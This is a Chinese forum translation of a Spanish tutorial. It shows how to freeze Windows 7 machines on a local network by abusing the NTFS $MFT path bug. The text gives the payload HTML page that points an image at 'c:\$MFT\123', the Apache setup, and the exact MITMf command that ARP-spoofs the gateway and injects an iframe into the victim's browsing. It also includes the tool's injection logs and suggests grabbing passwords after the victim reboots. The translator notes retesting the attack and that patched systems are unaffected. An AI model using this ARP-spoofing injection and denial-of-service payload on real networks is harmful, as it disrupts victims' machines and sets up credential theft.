-
-
[翻译]通过MITMf利用$MFT漏洞锁定局域网电脑
-
2018-1-20 16:46
-
虽然还没有被微软官方确认,但是signature Alladin Information公司研究员Anatolymik(俄罗斯)发现的bug,可以被用来锁定windows 7和 windows8.1系统。而且只需要简单的调用一个文件就可以实现锁定。
$MFT,保存着NTFS文件系统中每个文件的入口,当我们访问C: \ $ MFT \ hello.txt这个文件时,NT文件系统就会锁定整个C盘,因为C盘是系统盘,所以整个系统都会被锁定。
这个漏洞可以被本地利用,也可以远程通过IE或者Firefox利用,Chrome不受影响,我们可以使用MITMF引诱用户访问我们构造好的html页面从而利用该漏洞。
准备环境:
我们使用一台win7的机器,ip地址为 192.168.1.67。一台Kali机器,ip地址为 192.168.1.11。
使用MITMF利用MFT进行攻击
把恶意代码放在web服务器上,启动Kali机器的apache2服务:
root@kali:~# /etc/init.d/apache2 start [ ok ] Starting apache2 (via systemctl): apache2.service. root@kali:~#
我们用一个html文件来调用$MFT,然后将这个html文件通过MITMf以<iframe>的形式注入到目标用户的网页中,然后让目标访问。
将这个html文件命名为nice.html,然后放到/var/www/html路径下:
root@kali:/var/www/html# ls index.html nice.html root@kali:/var/www/html# cat nice.html <html> <img src="c:\$MFT\123" alt="Smiley face" height="42" width="42"> </html> root@kali:/var/www/html#
发动攻击
先确定apache服务启动:
root@kali:/var/www/html# /etc/init.d/apache2 status ● apache2.service - The Apache HTTP Server Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled) Active: active (running) since Tue 2017-05-30 12:16:16 EDT; 5min ago Process: 1104 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS) Main PID: 1115 (apache2) Tasks: 7 (limit: 4915) CGroup: /system.slice/apache2.service ├─1115 /usr/sbin/apache2 -k start ├─1133 /usr/sbin/apache2 -k start ├─1134 /usr/sbin/apache2 -k start ├─1135 /usr/sbin/apache2 -k start ├─1136 /usr/sbin/apache2 -k start ├─1137 /usr/sbin/apache2 -k start └─1138 /usr/sbin/apache2 -k start May 30 12:16:15 kali systemd[1]: Starting The Apache HTTP Server... May 30 12:16:16 kali apachectl[1104]: AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1. Set the 'ServerName' d…s this message May 30 12:16:16 kali systemd[1]: Started The Apache HTTP Server. Hint: Some lines were ellipsized, use -l to show in full.
确定OK后,我们启动MITMf将这个html注入给我们的目标,命令如下:
root@kali:~/MITMf# python ./mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.254 --target 192.168.1.67 --inject --html-url http://192.168.1.111/nice.html
这里我们告诉MITMf来欺骗网关192.168.1.254,目标机器是192.168.1.67,我们想注入http://192.168.1.111/nice.html到目标用户的浏览器上。
这条命令的输出应该如下所示:
root@kali:~/MITMf# python ./mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.254 --target 192.168.1.67 --inject --html-url http://192.168.1.111/nice.html @@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@@ @@@@@@@@ @@! @@! @@! @@! @@! @@! @@! @@! @@! !@! !@! !@! !@! !@! !@! !@! !@! !@! @!! !!@ @!@ !!@ @!! @!! !!@ @!@ @!!!:! !@! ! !@! !!! !!! !@! ! !@! !!!!!: !!: !!: !!: !!: !!: !!: !!: <img draggable="false" class="emoji" alt="" src="https://s.w.org/images/core/emoji/2.3/svg/2757.svg" scale="0"> <img draggable="false" class="emoji" alt="" src="https://s.w.org/images/core/emoji/2.3/svg/2757.svg" scale="0"> <img draggable="false" class="emoji" alt="" src="https://s.w.org/images/core/emoji/2.3/svg/2757.svg" scale="0"> <img draggable="false" class="emoji" alt="" src="https://s.w.org/images/core/emoji/2.3/svg/2757.svg" scale="0"> <img draggable="false" class="emoji" alt="" src="https://s.w.org/images/core/emoji/2.3/svg/2757.svg" scale="0"> <img draggable="false" class="emoji" alt="" src="https://s.w.org/images/core/emoji/2.3/svg/2757.svg" scale="0"> <img draggable="false" class="emoji" alt="" src="https://s.w.org/images/core/emoji/2.3/svg/2757.svg" scale="0"> ::: :: :: :: ::: :: :: : : : : : : : [*] MITMf v0.9.8 - 'The Dark Side' | |_ Net-Creds v1.0 online |_ Inject v0.4 |_ Spoof v0.6 | |_ ARP spoofing enabled |_ Sergio-Proxy v0.2.1 online |_ SSLstrip v0.9 by Moxie Marlinspike online | |_ MITMf-API online Error starting HTTP server: [Errno 98] Address already in use * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit) |_ HTTP server online |_ DNSChef v0.4 online |_ SMB server online
我们的目标访问任何页面,MITMf都会尝试将我们设计好的html注入到用户浏览页面中:
2017-05-30 12:27:07 192.168.1.67 [type:IE-8 os:Windows 7] www.bing.com 2017-05-30 12:27:26 192.168.1.67 [type:IE-8 os:Windows 7] elpais.com.co 2017-05-30 12:27:26 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: elpais.com.co 2017-05-30 12:27:27 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co 2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: www.elpais.com.co 2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co 2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co 2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co 2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co 2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co 2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co 2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] sso.elpais.com.co 2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] www.googletagservices.com 2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] www.google.com 2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] s7.addthis.com 2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] code3.adtlgc.com 2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] tag.navdmp.com 2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] raw.githack.com 2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] b.scorecardresearch.com 2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] s.clickiocdn.com 2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] s.clickiocdn.com 2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] cdnjs.cloudflare.com 2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co 2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] cdnjs.cloudflare.com 2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co 2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co 2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co 2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co 2017-05-30 12:27:32 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co 2017-05-30 12:27:32 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co 2017-05-30 12:27:32 192.168.1.67 [type:IE-8 os:Windows 7] cdn.cxense.com 2017-05-30 12:27:33 192.168.1.67 [type:IE-8 os:Windows 7] api.cxense.com 2017-05-30 12:27:33 192.168.1.67 [type:IE-8 os:Windows 7] api.cxense.com 2017-05-30 12:27:33 192.168.1.67 [type:IE-8 os:Windows 7] comcluster.cxense.com 2017-05-30 12:27:33 192.168.1.67 [type:Other-Other os:Other] g.symcd.com 2017-05-30 12:27:34 192.168.1.67 [type:Other-Other os:Other] clients1.google.com 2017-05-30 12:27:34 192.168.1.67 [type:IE-8 os:Windows 7] www.gstatic.com 2017-05-30 12:27:34 192.168.1.67 [type:IE-8 os:Windows 7] tpc.googlesyndication.com 2017-05-30 12:27:34 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: tpc.googlesyndication.com 2017-05-30 12:27:34 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co 2017-05-30 12:27:35 192.168.1.67 [type:IE-8 os:Windows 7] 192.168.1.111
2017-05-30 12:27:26 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: elpais.com.co 2017-05-30 12:27:27 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co 2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: www.elpais.com.co
win7机器被MITMf利用$MFT漏洞锁住了
现在我们的目标只有重启电脑,这样我们可以趁机在他们访问共享资源的时候抓取密码。
写在最后:
这种类型的攻击执行很简单,上面的例子只是一种可能,微软到现在还没有确认这个漏洞,所以我们会在接下来的几周看到更多的这种攻击。
最后,我们看看ascinema的展示:
ascinema演示参考原博地址:https://www.sysadminjd.com/vulnerabilidades-cmft-bloqueando-equipos-en-la-lan-con-mitmf/
正如演示的,利用这个漏洞很简单,为了防止被该漏洞攻击,我们只能使用Chrome,或者等着微软和Firefox发布补丁了。
原文地址:https://www.sysadminjd.com/vulnerabilidades-cmft-bloqueando-equipos-en-la-lan-con-mitmf/
本文由看雪翻译小组LImp翻译
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
翻译说明:
这篇文章是另一篇译文ADV170014 NTLM SSO 漏洞利用指南中提到的文章。
原文是西班牙文,所以有些地方可能翻译的不是很清楚,不过文章的内容很简单。译者用win7测试了下,用IE和Firefox都复测成功,不过另一台升级补丁的win7没有成功,应该是微软已经出了针对这个的补丁了吧。
其他参考:
1.中间人攻击利用框架 MITMf:https://github.com/byt3bl33d3r/MITMf
2.文章中提到的那个俄罗斯研究员的博客:Баг в NTFS, или как подвесить всю систему(A bug in NTFS,or how to hang the entire system): https://habrahabr.ru/company/aladdinrd/blog/329166/
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
[培训]《安卓高级研修班(网课)》月薪三万计划,掌 握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
|
|
|---|---|
